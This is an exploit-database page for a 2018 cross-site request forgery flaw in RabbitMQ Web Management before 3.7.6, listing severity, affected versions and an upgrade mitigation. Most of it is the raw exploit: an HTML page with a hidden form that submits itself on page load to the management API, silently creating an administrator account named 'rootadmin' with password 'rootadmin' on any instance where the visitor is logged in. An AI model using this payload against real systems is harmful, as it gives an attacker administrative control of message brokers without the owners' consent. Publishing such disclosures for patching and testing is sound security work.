header-logo
Suggest Exploit
vendor:
RabbitMQ Web Management
by:
Dolev Farhi
8.8
CVSS
HIGH
Cross-Site Request Forgery
352
CWE
Product Name: RabbitMQ Web Management
Affected Version From: 3.7.6 and below
Affected Version To: 3.7.6
Patch Exists: YES
Related CWE: N/A
CPE: a:rabbitmq:rabbitmq_web_management
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Ubuntu
2018

RabbitMQ Web Management < 3.7.6 - Cross-Site Request Forgery

A Cross-Site Request Forgery (CSRF) vulnerability exists in RabbitMQ Web Management versions prior to 3.7.6. An attacker can craft a malicious HTML page that, when visited by an authenticated user, will submit a POST request to the /api/users/rootadmin endpoint with the username, password, and tags parameters set to rootadmin, rootadmin, and administrator, respectively. This will create a new administrator user in the RabbitMQ instance.

Mitigation:

Upgrade to RabbitMQ Web Management version 3.7.6 or later.
Source

Exploit-DB raw data:

# Exploit Title: RabbitMQ Web Management < 3.7.6 - Cross-Site Request Forgery
# Date: 2018-06-17
# Author: Dolev Farhi
# Vendor or Software Link: www.rabbitmq.com
# Version: 3.7.6
# Tested on: Ubuntu

<html>  
<h2>Add RabbitMQ Admin</h2>

<body>
<form name="rabbit" id="rabbit" action="http://Target/api/users/rootadmin" method="POST">
<input type="hidden" name="username" value="rootadmin" />
<input type="hidden" name="password" value="rootadmin" />
<input type="hidden" name="tags" value="administrator" />
<input type="submit"  value="save" />
</form>

<script>
  window.onload = rabbit.submit()
</script>

</body>
</html>

Navigation

Suggest Exploit

Services By CQR